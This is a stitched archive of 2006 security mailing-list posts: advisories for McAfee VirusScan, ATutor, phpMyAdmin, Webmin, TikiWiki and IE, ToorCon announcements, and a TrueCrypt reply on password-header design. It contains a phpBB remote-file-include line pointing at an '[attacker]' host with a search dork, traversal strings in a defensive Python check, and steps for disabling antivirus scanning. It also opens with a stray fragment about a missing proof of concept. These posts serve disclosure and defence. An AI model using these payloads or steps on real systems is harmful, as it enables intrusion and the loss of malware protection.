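The decoded PoC also shows why its column count is what it is: a UNION only works when every SELECT produces the same number of columns, so the attacker had to pad with literal `1`s until the count matched the application's own query, which is the part the stand-in above does not reproduce.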


McAfee VirusScan Enterprise - disabling the client side "On-Access Scan"

2006-09-18 Thread [EMAIL PROTECTED]
Suggested Risk Level: Low


Type of Risk: Disabling security component.


Affected Software: VirusScan Enterprise 7.1.0 (client side, managed
centrally by ePolicy Orchestrator), Scan Engine: 4.4.00, the "VirusScan
On-Access Scan" component.
OS Environment: Windows 2000 workstation w/SP4 and all the up-to-date
windows update security and operational patches (May be valid on Windows XP
as well, but was not tested on XP).


Local / Remote activated: Local.


Summary:
A McAfee administrator can choose to prevent a local user of the VirusScan
client from disabling the "On-Access Scan" (the real-time memory virus
monitoring and cleaning component) by making the "disable" button inactive
within the "VirusScan On-Access Scan Statistics" dialog box.

But, just after a user logs on locally to the desktop, and after any period
of time, until the first time the "VirusScan On-Access Scan Statistics"
dialog box is opened – the user can double click the "VirusScan On-Access
Scan" icon on the task bar and then the "disable" button will be active for
about 5 seconds, a sufficient time for the user to press this button.

After pressing the "disable" button, the button will change its interface
text to "enable", the "On-Access Scan" icon will present a "no entrance"
sign, stating it is disabled, and the "Network Associates McShield" service
will be in a "paused" mode.

Once the 5 seconds period has passed – the button will become disabled
(grayed out) in whatever state it is at that time, stabilizing the
"On-Access Scan" component to its last state, which is one of two:
1. The button was not pressed -> Button shows "disable" ; the "On-Access
Scan" is active and the "Network Associates McShield" service will be in a
"started" mode.
2. The button was pressed -> Button shows "enable" ; the "On-Access Scan" is
disabled and the "Network Associates McShield" service will be in a "paused"
mode.

I rated this issue as "low" because it is mostly an interface related issue,
and the user must be a member of a local users group that can pause a
service, i.e. "power users" or "Administrators", which are the most
privileged users groups in the OS.

This issue is relevant only in cases where the OS, particularly the
interface, was heavily hardened (especially preventing access to the
"services" console and preventing running any command line interface), but
the user has access to the "VirusScan On-Access Scan Statistics" dialog box
and is a member of the "power users" or "Administrators" groups.


Possible Abuses: Disabling the VirusScan real-time virus protection,
exposing the OS to virus infection.


Reproduction:
1. Make sure the VirusScan policy is prohibiting users from disabling the
"On-Access Scan" component.
2. Log on locally to the OS with a user that is a member of the "power
users" or "administrators" group.
3. Wait any period of time you wish.
4. Double click the "VirusScan On-Access Scan Statistics" icon placed on the
task bar.
5. Click the "disable" button within 5 seconds.
6. Wait a few seconds for the button to gray out, stabilizing the "On-Access
Scan" component in a "disabled" mode.


Exploit Code: No need.


Direct resolution: None at the time of publishing this advisory.
 

Workarounds: Enable the "Do not show the system tray icon" policy option –
to prevent your users from opening the "VirusScan On-Access Scan Statistics"
dialog box, and thus prevent them from reaching the "disable" button.
(Using this workaround may alarm users, who may take the sudden absence of
the icon as a sign of possible harm to the virus protection, and thus
initiate multiple support calls.)


Vendor Notification: McAfee was notified in May 2006 and has approved my
findings. McAfee chose to include a fix for this issue as part of a major
product update, which is scheduled to be released in the coming
month/months.


Credit:
Eitan Caspi
Israel
Email: [EMAIL PROTECTED]


 
Past security advisories:

1.
http://online.securityfocus.com/bid/4053
http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx
http://support.microsoft.com/kb/315085/en-us

2.
http://online.securityfocus.com/bid/5972
http://support.microsoft.com/?kbid=329350

3.
http://online.securityfocus.com/bid/6280
http://www.securityfocus.com/archive/1/301624

4.
http://online.securityfocus.com/bid/6736
http://online.securityfocus.com/archive/1/309442

5.
http://www.securityfocus.com/bid/7046
http://www.securityfocus.com/archive/1/314361

6.
http://www.securityfocus.com/archive/1/393800

7.
http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded


Articles:
You can find some a

ToorCon Pre-Registration Closing Friday!

2006-09-14 Thread [EMAIL PROTECTED]
PRE-REGISTRATION CLOSING ON FRIDAY, SEPTEMBER 15TH

Don't miss out on the discounted rates for attending ToorCon 8, San
Diego's exclusive hacker convention, going on from September 29th
through October 1st.
[http://www.toorcon.org]


GENERAL ADMISSION

Currently general admission is only $80 which will increase to $120 at
the door.
[http://www.toorcon.org/2006/conference.html]


DEEP KNOWLEDGE SEMINARS

We are also offering Deep Knowledge Seminars, targeted towards the
corporate hackers and decision makers, for only $800 which will increase
to $1,000 at the door.
[http://www.toorcon.org/2006/seminars.html]


HARDWARE HACKING & WIRELESS MESH WORKSHOPS

This is our first year of hands-on workshops which provide a
crash-course in hardware hacking and hacking wireless mesh networks. The
workshops are only $1,200 right now, which includes all of the hardware
and tools needed, and will increase to $1,600 at the door if there are
any seats left. Seats are quickly running out for both the Workshops and
the Seminars so make sure you register soon!
[http://www.toorcon.org/2006/workshops.html]


PRE-REGISTRATION

This is your last chance to pre-register and save on your admission to
the conference. Pre-registration also includes a free ToorCon 8 T-shirt
and express registration at the conference.
[http://www.toorcon.org/2006/registration.html]


ToorCon 8 Call for Papers Closing Tomorrow & Workshops/Seminars Added

2006-08-18 Thread [EMAIL PROTECTED]
CALL FOR PAPERS CLOSING!

Just wanted to let you know that the ToorCon 8 CFP will be closing at
the end of Friday, August 18th (tomorrow). If you're interested in
submitting, please make sure you get your submissions in before midnight
tomorrow. For more info, check out the CFP at:
http://www.toorcon.org/2006/cfp.html


SWEET ASCII/ANSI ART CFP SUBMISSIONS!

To check out some of the really sweet submissions we've received (in all
of their ascii/ansi art glory), check out some of the following links:

aempirei
http://toorcon.org/2006/cfp/aempirei.html

vlad902
http://toorcon.org/2006/cfp/vlad902.c.txt

spoonm
http://toorcon.org/2006/cfp/spoonm.html

Tom St Denis (requires Firefox)
http://toorcon.org/2006/cfp/tomstdenis.html

asm
http://toorcon.org/2006/cfp/asm/

Gabriel Lawrence & Patrick Nehls
http://toorcon.org/2006/cfp/glawrence.html

Tom Cross
http://toorcon.org/2006/cfp/tcross.txt


GENERAL CONFERENCE

Currently, the general conference is $70 to pre-register, which will
increase to $80 on September 1st. We haven't posted any talks yet, but
should have the finalized schedule up by Monday, August 21st.


DEEP KNOWLEDGE SEMINARS

This year we will once again be having the Deep Knowledge Seminars on
Friday, September 29th, right before the general conference. We are
currently still working on the lineup, which will consist of five 90-minute
sessions, but are offering this as a more corporate oriented session and
limiting the attendance to 20 people. The current pre-registration price
is $500, but is reduced to $300 if you register in conjunction with a
Workshop. The prices will be increasing to $800 on September 1st, and
will be $1,000 at the door, so pre-register soon!


WORKSHOPS

We are also proud to announce that we are having 2 hands-on workshops
this year:

~ Hardware Hacking Workshop ~
Instructor: bunnie
Dates: Monday, October 2nd, 2006
Price: $900
Availability: 9 seats remaining
Includes: Secret-bunnie-hardware, Soldering toolkit, & Cables

This one-day workshop will introduce you to the basics of embedded
processor hacking. In this unique workshop, you will get to hack a
commercial embedded system for a product to be launched in Late August.
The workshop will be held by the embedded electronics' designer. As a
result, material will be presented from two perspectives when relevant:
from that of a designer, and from that of a hacker. The workshop will
begin with an overview of the hardware, and the design process that went
into the hardware. Then, we will delve into the backdoors built into the
product that can be used to commandeer the hardware for your purposes.
You will learn several methods for attacking the embedded OS. Finally,
you will build and add a small sensor module to the hardware. The
workshop will conclude with the briefest introduction to writing drivers
for this sensor module in Linux.

We assume that the workshop attendee has minimal to no familiarity with
hardware, but is fluent in C and assembly, and has a solid understanding
of Linux OS fundamentals.

~ Building/Hacking Open Source Embedded Wireless Mesh Routers ~
Instructor: Ken Caruso & Matt Westervelt
Dates: Monday, October 2nd, 2006
Price: $900
Availability: 8 seats remaining
Includes: Soekris AP, Wireless Card, Case, & Antenna

This class will take a very effective approach to teach you the basics
of embedded hacking and wireless mesh. First we give you your own
embedded wireless box to work on (which you take home at the end of the
class). Second we teach you how to bootstrap it with an operating system
while keeping it within the 64-megabyte space limitation on the device.
Third we teach you how to take this platform and make it part of a
wireless mesh network using three different Open Source mesh
implementations. Fourth we cover security issues with these protocols,
how to mitigate and how to take advantage of them.


SPONSORS

We are finalizing our list of vendors and sponsors, so if you are
interested in sponsoring, please contact us soon! We have our
sponsorship rates posted up at http://www.toorcon.org/2006/sponsors.html
and don't hesitate to reply to this email to discuss the different options.


GENERAL INFO

Located in sunny San Diego during September for the past 8 years,
ToorCon has been providing a meeting place for many of the top hackers
and security professionals from all around the world to get together and
discuss today's bleeding edge issues. ToorCon's main goal is to provide
a low cost conference with a high quality atmosphere.

This year we are still aiming to provide the same highly technical
lectures you've come to know and love, but also set the theme as "Bits &
Bites" which will highlight the low level skills of the trade and focus
on Reverse Engineering, Protocol Analysis, Cryptography, Hardware Hacks,
and other nifty bit-twiddling and byte munging techniques.

ToorCon 8: Bits & Bites
September 29th-October 2nd, 2006
San Diego Convention Center
Rooms 24-26
111 W. Harbor Drive
San Diego, CA 92101
http:

ToorCon 2006 Call for Papers

2006-07-18 Thread [EMAIL PROTECTED]
ToorCon 2006 Call for Papers - Issued June 6th 2006

Papers and presentations are being accepted for ToorCon 2006 to be held
at the Convention Center in San Diego, CA on September 29th-October 1st.
Please email your submissions to cfp [at] toorcon.org; submissions will
be accepted until August 18th, 2006.


About ToorCon

ToorCon is just around the corner again this year. In its 8th running
year, it is still San Diego's exclusive hacker convention, bringing
together Southern California's hacker community year after year to
attend the high quality presentations and participate in the annual
festivities. This year we are still aiming to provide the same highly
technical lectures you've come to know and love, but also set the theme
as "Bits & Bites" which will highlight the low level skills of the trade
and focus on Reverse Engineering, Protocol Analysis, Cryptography,
Hardware Hacks, and other nifty bit-twiddling and byte munging
techniques. Once again, we will be offering an intensive full-day Deep
Knowledge Seminar on Friday the 29th that we are also accepting
submissions for.


Submission of Papers

ToorCon only accepts talks on new technologies and methodologies that
have been recently developed. We will not accept papers that have
already been presented prior to 2006, unless they present fundamental
concepts or conform to any of the outlined topics below.

Special consideration will be given to papers addressing the following
topics:

* Reverse Engineering
* Protocol Analysis
* Cryptography
* Hardware Hacks
* Anything related to Bits & Bites, the number 8, and/or includes a
  sweet ascii/ansi art demo :-)

All conference talks should be 50 minutes in length including time for
delegate participation and questions at the end of the presentation.
Deep Knowledge Seminar talks should be 90 minutes in length and should
include hands-on participation for an audience of 25-35 people.
Inclusion of any talk related tools, white papers or source code will
help during the selection process. While we try to facilitate speakers'
requests for equipment, we may not be able to accommodate all requests.
In cases where we cannot guarantee special equipment the speaker is
expected to supply hardware and/or software. Each speaker is also
expected to bring their own laptop to display their presentation.

All talks must be vendor neutral, while speakers are welcome to present
on behalf of a company - sales pitches will be thrown out.


Remuneration

For each chosen presentation ToorCon will give the speaker and 1 guest
free admission to the conference, admission to the Deep Knowledge
Seminars (limited to the first 10 speakers to request admission), and
lots of free drinks :-).


Speaker Requirements

Please include the following information with your submission:

1. What title you are submitting your paper under.
2. A valid e-mail address AND telephone number where you can be
   reached.
3. Number of people that will be presenting.
4. A brief description of your talk and what will be presented
5. A brief biography on why you are qualified to speak on your
   topic. This and your description will be used on
   toorcon.org as well as in any press material for the
   conference.
6. If you are speaking under a company name, please specify for
   which company you work.
7. Will your talk include a sweet ascii/ansi art demo?
8. Would you like to be considered for speaking at the Deep
   Knowledge Seminars?

For an example of good submissions, see:

* Chris Abad   - http://toorcon.org/2006/cfp/aempirei.html
* Tom St Denis - http://toorcon.org/2006/cfp/tomstdenis.html

Note that by presenting at ToorCon 2006 you grant ToorCon permission to
reproduce, distribute and/or advertise your talk as seen fit. If your
talk is accepted and because of some emergency you are unable to speak,
you must notify ToorCon within 24 hours of your talk, otherwise ToorCon
reserves the right to tell all the other fellow hacker cons how you
ditched out at the last minute and take it into consideration the next
time you submit a talk :).


Location Information

This year's event will be held at the San Diego Convention Center. The
reception and conference will take place on September 29th-October 1st
in meeting rooms 24-26 at the San Diego Convention Center's (front)
upper level.

September 29th-October 1st, 2006
San Diego Convention Center
111 W. Harbor Drive
San Diego, CA 92101
http://sdccc.org


Important Dates

June 6th, 2006: Official Call For Papers issued
July 28th, 2006: First round of selection announced
August 18th, 2006: Call for Papers closes
September 8th, 2006: Final material submission for collateral
September 29th, 2006: ToorCon 2006


ATutor : Cross-Site Scripting Vulnerabilities

2006-07-07 Thread [EMAIL PROTECTED]
-
[#] Security Advisory #4
[^] http://securitynews.ir/

[>] Advisory Title: ATutor : Cross-Site Scripting Vulnerabilities
[EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir
[$] Product Vendor : http://www.atutor.ca/
[.] Affected Versions : 1.5.3 RC2 (and maybe before)
[/] Release Date : 07/07/2006
-
[*] Overview :
ATutor is an Open Source Web-based Learning Content Management
System (LCMS).
There are several XSS bugs in ATutor 1.5.3 RC2. Affected files
are: /admin/create_course.php, /users/create_course.php,
/documentation/admin/index.php, /password_reminder.php,
/users/browse.php, /admin/fix_content.php.

[*] Details :
No exploitable details are going to be released.

[*] Solution :
Upgrade to version 1.5.3 :
http://www.atutor.ca/atutor/download.php

--
http://securitynews.ir/advisories/atutor153rc2.txt



phpMyAdmin : Cross-Site Scripting Vulnerability

2006-07-01 Thread [EMAIL PROTECTED]
---
[#] Security Advisory #3
[^] http://securitynews.ir/

[>] Advisory Title: phpMyAdmin : Cross-Site Scripting Vulnerability
[EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir
[$] Product Vendor : http://www.phpmyadmin.net/
[.] Affected Versions : 2.8.1 (and maybe before)
[/] Release Date : 06/30/2006
---
[*] Overview :
phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web.
An XSS bug has been found in phpMyAdmin 2.8.1.

[*] Details :
No exploitable details are going to be released.

[*] Solution :
Upgrade to the new version (2.8.2) :
http://www.phpmyadmin.net/home_page/downloads.php

[*] References :
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-4

---
http://securitynews.ir/advisories/phpmyadmin281.txt



Claroline Cross-Site Scripting Vulnerabilities

2006-06-26 Thread [EMAIL PROTECTED]
--
[#] Security Advisory
[^] http://securitynews.ir/

[>] Advisory Title: Claroline Cross-Site Scripting Vulnerabilities
[EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir
[$] Product Vendor : http://www.claroline.net/
[.] Affected Versions : 1.7.7 (and maybe before)
[/] Release Date : 06/26/2006
--
[*] Overview :
Claroline is a free application based on PHP/MySQL allowing
teachers or education organizations to create and administer
courses through the web.
Several cross-site scripting bugs have been found in
Claroline 1.7.7.

[*] Details :
No exploitable details are going to be released.

[*] Solution :
Vendor contacted on 06/25/2006. The vendor has released
a security patch:
http://www.claroline.net/dlarea/claroline.patch17701.zip

--
http://securitynews.ir/



[SNS Advisory No.88] Webmin Directory Traversal Vulnerability

2006-06-23 Thread [EMAIL PROTECTED]
--
SNS Advisory No.88
Webmin Directory Traversal Vulnerability

Problem first discovered on: Sun, 04 Jun 2006
Published on: Fri, 23 Jun 2006
--

Severity Level:
---
  Medium

Overview:
-
  Webmin for Windows contains a directory traversal vulnerability that
  allows remote attackers to download arbitrary files without authentication.

Problem Description:

  Webmin is a web-based system administration tool for the Unix, Mac OS X and
  Windows platforms.

  Webmin 1.270 and earlier versions do not properly handle "\" (backslash).
  On the Windows platform, this allows attackers to access directories and
  files outside of the public directory.

  In the default configuration of Webmin, authentication is required to
  access almost all directories under the top page. But there are some
  directories that can be accessed without authentication, for example the
  directory which stores the images used before login.

  Therefore, by exploiting the directory traversal vulnerability from these
  directories, remote attackers can download the contents of arbitrary files
  without authentication.

Affected Versions:
--
  Webmin (on Windows) Version 1.270 and earlier versions

Solution:
-
  This problem can be addressed by upgrading Webmin to 1.280 or later.

  http://www.webmin.com/ 

Discovered by:
--
  Keigo Yamazaki (LAC) 

Thanks to:
--
This SNS Advisory is being published in coordination with the
Information-technology Promotion Agency, Japan (IPA) and JPCERT/CC.

  http://jvn.jp/jp/JVN%2367974490/index.html
  http://www.ipa.go.jp/security/vuln/documents/2006/JVN_67974490_webmin.html 

Disclaimer:
---
  The information contained in this advisory may be revised without prior
  notice and is provided as it is. Users shall take their own risk when
  taking any actions following reading this advisory. LAC Co., Ltd.
  shall take no responsibility for any problems, loss or damage caused
  by, or by the use of information provided here.

  This advisory can be found at the following URL:
  http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html
--
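The backslash handling the advisory describes, as an added example in Python (not Webmin's code, which is Perl): a filter that only knows "/" as a separator blocks "../" but lets "..\" through, and on Windows the filesystem treats "\" as a separator, so the request walks out of the document root. Resolving the request against the root and checking containment catches both forms on any OS. The document root, the image directory and the request paths below are constructed for this example.

```python
"""Added example, not Webmin's code: the traversal check that the advisory
says was missing. Paths, file names and requests are constructed."""
import os
import re
import tempfile
from typing import Dict, Optional, Tuple


def naive_is_safe(url_path: str) -> bool:
    """Filter that only knows '/' as a separator: it blocks '../' but lets
    '..\\' through, and on Windows the filesystem treats '\\' as '/'."""
    return "../" not in url_path and not url_path.startswith("/")


def resolve_contained(root: str, url_path: str) -> Optional[str]:
    """Map a request path onto the filesystem and return the absolute path
    only if it stays under *root*. Both '/' and '\\' are split on before the
    path is resolved, so the result does not depend on the host OS."""
    parts = [p for p in re.split(r"[\\/]+", url_path) if p not in ("", ".")]
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:          # different drives on Windows
        inside = False
    return candidate if inside else None


def demo() -> Dict[str, Tuple[bool, bool]]:
    """Run both checks on requests shaped like the advisory's case: an
    unauthenticated image directory used as the starting point. Returns
    {name: (naive filter says safe, containment check says safe)}."""
    requests = {
        "login image":         "images/login.gif",
        "posix traversal":     "images/../../etc/passwd",
        "backslash traversal": "images\\..\\..\\etc\\passwd",
        "mixed separators":    "images/..\\..\\etc/passwd",
    }
    with tempfile.TemporaryDirectory() as root:       # constructed document root
        os.makedirs(os.path.join(root, "images"))
        return {
            name: (naive_is_safe(p), resolve_contained(root, p) is not None)
            for name, p in requests.items()
        }


if __name__ == "__main__":
    for name, (naive, contained) in demo().items():
        print(f"{name:20s} naive={'pass' if naive else 'block'}  "
              f"contained={'pass' if contained else 'block'}")
```

The naive filter passes the two backslash requests; the containment check rejects everything that resolves outside the root, regardless of which separator the client used.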




TikiWiki Sql injection & XSS Vulnerabilities

2006-06-13 Thread [EMAIL PROTECTED]

[#] Security Advisory
[^] http://securitynews.ir/

[>] Advisory Title: TikiWiki Sql injection & XSS Vulnerabilities
[EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir
[$] Product Vendor : http://tikiwiki.org/
[.] Affected Versions : 1.9.3.2 (and maybe before)
[/] Release Date : 06/13/2006

[*] Overview :
TikiWiki is a very powerful multilingual Wiki/CMS/Groupware, but
it has some security bugs too.
One SQL injection and several cross-site scripting bugs have
been found in TikiWiki 1.9.3.2 (and tested in 1.9.3.1).

[*] Details :
No exploitable detail is going to be released.

[*] Solution :
Vendor contacted on 06/09/2006 and they have released a new
version (tikiwiki 1.9.4):
http://sourceforge.net/project/showfiles.php?group_id=64258

--
http://securitynews.ir/



Re: phpBB2 (template.php) Remote File Inclusion

2006-06-05 Thread [EMAIL PROTECTED]

template.php is an addon and not part of phpbb2, noobs


[EMAIL PROTECTED] wrote:



*Title:

*phpBB2 Remote File Include

*

*

*Credit:

*Canberx

*

*

*Thanx:

*Forewer-Partizan

*

*

*Mail:

[EMAIL PROTECTED]www.canberx.tk

*

*

*Google Dork:

*Powered by phpBB © 2001, 2002 phpBB Group

*

*

*Exploit:

*www.target.com/[path_to_phpbb]/template.php?page=[attacker]

*

*

*


Plz don't hack a site if it has already been defaced :)


*





  


Arnaud Dovi / Independent Security Researcher



Blackhat USA 2006 - Review , remarks and proposal agenda

2006-06-04 Thread [EMAIL PROTECTED]
Ode: Hiding Shellcode In Plain Sight - Michael 
Sutton & Greg McManus


Day 2 :
09:00 - 09:50 -> RFID Malware Demystified - Melanie Rieback
10:00 - 11:00 -> Hacking Intranet Websites from the Outside
"JavaScript malware just got a lot more dangerous"- Jeremiah Grossman & 
TC Niedzialkowski

11:15 - 12:30 -> AJAX (in)security - Billy Hoffman
13:45 - 15:00 -> WiFi in Windows Vista: A Peek Inside the Kimono - Noel 
Anderson
15:15 - 16:30 -> Vulnerabilities in Not-So Embedded Systems - Brendan 
O'Connor
16:45 - 18:00 -> Faster Pwning Assured: Hardware Hacks and Cracks with 
FPGAs- David Hulton


It's just a proposal, and the main problem with these USA briefings is 
that if your company wants to take maximum benefit from this 
conference, it will need to send 2 or 3 employees to follow all the 
interesting sessions ... that's the only drawback of Blackhat: too many 
interesting subjects for one attendee :-)


Regards -
Comments are welcome on http:www.security-briefings.com







Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2

2006-05-26 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Are you sure DoS only? I got a quick look at it, and if you are able to
control this null pointer, the bug is exploitable; it might be good to do more
research on this bug.

[EMAIL PROTECTED] wrote:
> Hash: RIPEMD160
>
>
>  ---
>
> | BuHa Security-Advisory #12|May 25th, 2006 |
>
>  ---
>
> | Vendor   | MS Internet Explorer 6.0   |
>
> | URL  | http://www.microsoft.com/windows/ie/   |
>
> | Version  | <= 6.0.2900.2180.xpsp_sp2  |
>
> | Risk | Low (Denial of Service)|
>
>  ---
>
>
> o Description:
>
> =
>
>
> Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
>
> made by Microsoft and currently available as part of Microsoft Windows.
>
>
> Visit http://www.microsoft.com/windows/ie/default.mspx or
>
> http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
>
>
> o Denial of Service: #7d6d2db4
>
> ===
>
>
> Following HTML code forces MS IE 6 to crash:
>
> >>  
>
>
> Online-demo:
>
> http://morph3us.org/security/pen-testing/msie/ie60-1132901785453-7d6d2db4.html
>
>
> These are the register values and the ASM dump at the time of the access
>
> violation:
>
> >> eax= ebx= ecx=00e78d38 edx=00e7a704 esi=0012a268
>
> >> edi= eip=7d6d2db4 esp=0012a228 ebp=0012a25c
>
>
> >> 7d6d2d7d e868f9   callmshtml+0x2226ea (7d6d26ea)
>
> >> 7d6d2d82 50   pusheax
>
> >> 7d6d2d83 e835f8   callmshtml+0x2225bd (7d6d25bd)
>
> >> 7d6d2d88 85c0 testeax,eax
>
> >> 7d6d2d8a 8945f8   mov [ebp-0x8],eax
>
> >> 7d6d2d8d 0f85c402 jne mshtml+0x223057 (7d6d3057)
>
> >> 7d6d2d93 8b461c   mov eax,[esi+0x1c]
>
> >> 7d6d2d96 8b4e18   mov ecx,[esi+0x18]
>
> >> 7d6d2d99 8365f400 and dword ptr [ebp-0xc],0x0
>
> >> 7d6d2d9d 8365fc00 and dword ptr [ebp-0x4],0x0
>
> >> 7d6d2da1 8b7e14   mov edi,[esi+0x14]
>
> >> 7d6d2da4 8945f0   mov [ebp-0x10],eax
>
> >> 7d6d2da7 e88462e4ff   callmshtml+0x69030 (7d519030)
>
> >> 7d6d2dac 3bc7 cmp eax,edi
>
> >> 7d6d2dae 0f840202 je  mshtml+0x222fb6 (7d6d2fb6)
>
> >> FAULT ->7d6d2db4 8b07 mov eax,[edi]
>
> >>   ds:0023:=
>
> >> 7d6d2db6 8bc8 mov ecx,eax
>
> >> 7d6d2db8 83e10f   and ecx,0xf
>
> >> 7d6d2dbb 49   dec ecx
>
> >> 7d6d2dbc 0f849c01 je  mshtml+0x222f5e (7d6d2f5e)
>
> >> 7d6d2dc2 49   dec ecx
>
> >> 7d6d2dc3 0f84b300 je  mshtml+0x222e7c (7d6d2e7c)
>
> >> 7d6d2dc9 49   dec ecx
>
> >> 7d6d2dca 49   dec ecx
>
> >> 7d6d2dcb 746c jz  mshtml+0x222e39 (7d6d2e39)
>
> >> 7d6d2dcd 83e904   sub ecx,0x4
>
> >> 7d6d2dd0 0f85a501 jne mshtml+0x222f7b (7d6d2f7b)
>
> >> 7d6d2dd6 8bcf mov ecx,edi
>
> >> 7d6d2dd8 e8482ffeff   callmshtml+0x205d25 (7d6b5d25)
>
> >> 7d6d2ddd 85c0 testeax,eax
>
> >> 7d6d2ddf 7430 jz  mshtml+0x222e11 (7d6d2e11)
>
> >> 7d6d2de1 837e0400 cmp dword ptr [esi+0x4],0x0
>
>
> This issue is a non-exploitable Null Pointer Dereference vulnerability and
>
> leads to DoS.
>
>
> o Vulnerable versions:
>
> =
>
>
> The DoS vulnerability was successfully tested on:
>
> >> MS IE 6 SP2 - Win XP Pro SP2
>
> >> MS IE 6 - Win 2k SP4
>
>
> o Disclosure Timeline:
>
> =
>
>
> xx Feb 06 - Vulnerabilities discovered.
>
> 08 Mar 06 - Vendor contacted.
>
> 22 Mar 06 - Vendor confirmed vulnerabilities.
>
> 25 May 06 - Public release.
>
>
> o Solution:
>
> ==
>
>
> I think - this is not an official statement from the Micros

RE: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.

2006-05-26 Thread [EMAIL PROTECTED]
Hello,

This is an official response from the TrueCrypt development team.

First, this is not a security bug. It is a known, documented and 
expected feature. It is utilized, for example, for the volume header 
backup/restore operation.

Quotes from the TrueCrypt documentation:

"WARNING: Restoring a volume header also restores the volume password 
that was valid when the volume header backup was created."

Quote 2:
"Note that if an adversary knows your password and has access to your 
volume, he may be able to retrieve and keep its master key. If he does, 
he may be able to decrypt your volume even after you change its 
password (because the master key was not changed). In such a case, 
create a new TrueCrypt volume and move all files from the old volume to 
this new one."

Sincerely,
Ennead
TrueCrypt Foundation

>  
> Hello,
> 
> Are you aware of this issue?
> 
> Regards,
> 
> Christopher.
> 
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, May 25, 2006 3:56 AM
> To: bugtraq@securityfocus.com
> Subject: A Nasty Security Bug that affect PGP Virtual Disks & PGP 
SDA , PGP
> 8.x & 9.x and Truecrypt.
> 
> A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 
8.x & 9.x
> and Truecrypt. 
> 
> 
> Affected Products:
> 
> 
> * PGP 8.x PGP 9.x maybe older version too
> 
> 
> * Truecrypt 4.2 maybe older version too
> 
> 
> // Full detail can be found here //
> 
> <> http://www.safehack.com/Advisory/pgp/PGPcrack.html
> 
> <> http://www.safehack.com/Advisory/truecrypt/truecrypt.html
> 
> 
> If you would like to watch the flash video check the following links.
> 
> <> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02
> 
>http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html
> 
> 
> <> truecrypt.html Tested on the latest version truecrypt-4.2.zip
> 
>http://www.safehack.com/Advisory/truecrypt/truecrypt.html
> 
>Note If you put stuff inside your test file you need to use a 
> 
>debugger to extract the data. If you just follow the video you 
> 
>will see how it is done without a debugger and an empty file.
> 
> 
> The How?
> 
> 
> 
> I Was able to ACCESS PGP encrypted disks if the disk was encrypted 
with a
> passphrase or a public Key. This method will work on both scary huh :-
)
> 
> 
> You need the followings tools:
> 
> --
> 
>1. A Brain
> 
>2. A Hex Editor.
> 
>3. PGP 8.1 Enterprise or Personal. You can use 9.x too. My feeling is
> this method will work on older versions too, because it is a design flaw in
> PGP application not in PGP algorithm.
> 
>4. A Debugger. Not needed if you want to backdoor PGP (OllyDbg)
> 
>
> 
> During my tests I have found that PGP virtual DISK and PGP Self 
Extractable
> file SDA have a SERIOUS security bug. I would rather say a design bug.
> 
> 
> PGP disk or SDA can be cracked in 3 major steps:
> 
> 
> 
>1. Editing PGP protected file using a hex editor. (Patching the
> passphrase).
> 
>2. Tracing PGP protected file using a debugger. (You need a lot of 
time
> and coding/cracking experience)
> 
>3. Patching the responsible bytes.
> 
> 
> I have spent only a couple of days debugging, but surely a lot more time is
> needed. But once the process is understood it is a question of finding the
> right bytes and patching them.
> 
> 
>  
> 
> Conclusions for 6 days debugging and testing:
> 
> =
> 
> * PGP Virtual Disk and PGP SDA have a serious bug. I have tested
> PGP 8.1 Enterprise. Other versions may be vulnerable too.
> 
> 
> * PGP corporation made the same error in PGP 9.x you can bypass 
the
> passphrase Dialog box same way.
> 
> 
> * PGP corporation could avoid this type of issue by calculating the HASH
> for the encrypted file. They should make it harder to locate the passphrase.
> 
> 
> * PGP Virtual Disk First Level protection bypass. Passphrase 
bypass.
> (Working 100%)
> 
> 
> * PGP Virtual Disk Backdooring (Working 100%).
> 
> 
> * PGP Virtual Disk Mounting / Adding Users / Deleting Users /
> Re-Encrypting Disk (Working 100%).
> 
> 
> * PGP Virtual Disk Mounting and Data Access (Working 40%. Need 
more time
> to debug).
> 
> 
> * PGP SDA Passphrase bypass. (Working 100%)
> 
> 
> * PGP SDA Extraction is possible IF the input file is the same 
(Working
> 100% Patching using a Debugger)
> 
> 
> * PGP SDA 

Addendum

2006-05-26 Thread [EMAIL PROTECTED]

Addendum to my previous letter:

Note that this design (master key encrypted with header key) is common 
and has been used for many years by many products (for example, 
Scramdisk, E4M, etc.)

The main advantage of the design is that the user can change his 
password within a few seconds without having to re-encrypt the entire 
volume (which could take even days or weeks).

In case of TrueCrypt, this also allows administrators in large 
corporations to "reset" passwords when a user forgets his password. 
This is described in the manual and in the FAQ:

Quote from the TrueCrypt FAQ:

"Q: We use TrueCrypt in a corporate environment. Is there a way for an 
administrator to reset a volume password when a user forgets it (or 
when he or she loses the keyfile)?

A: There is no “back door” implemented in TrueCrypt. However, there is 
a way to “reset” a TrueCrypt volume password/keyfile. After you create 
a volume, backup its header (select Tools -> Backup Volume Header) 
before you allow a non-admin user to use the volume. Note that the 
volume header (which is encrypted with a header key derived from a 
password/keyfile) contains the master key with which the volume is 
encrypted. Then ask the user to choose a password, and set it for 
him/her (Volumes -> Change Volume Password); or generate a user keyfile 
for him/her. Then you can allow the user to use the volume and to 
change the password/keyfiles without your assistance/permission. In 
case he/she forgets his/her password or loses his/her keyfile, you 
can “reset” the volume password/keyfiles to your original admin 
password/keyfiles by restoring the volume header (Tools -> Restore 
Volume Header)."



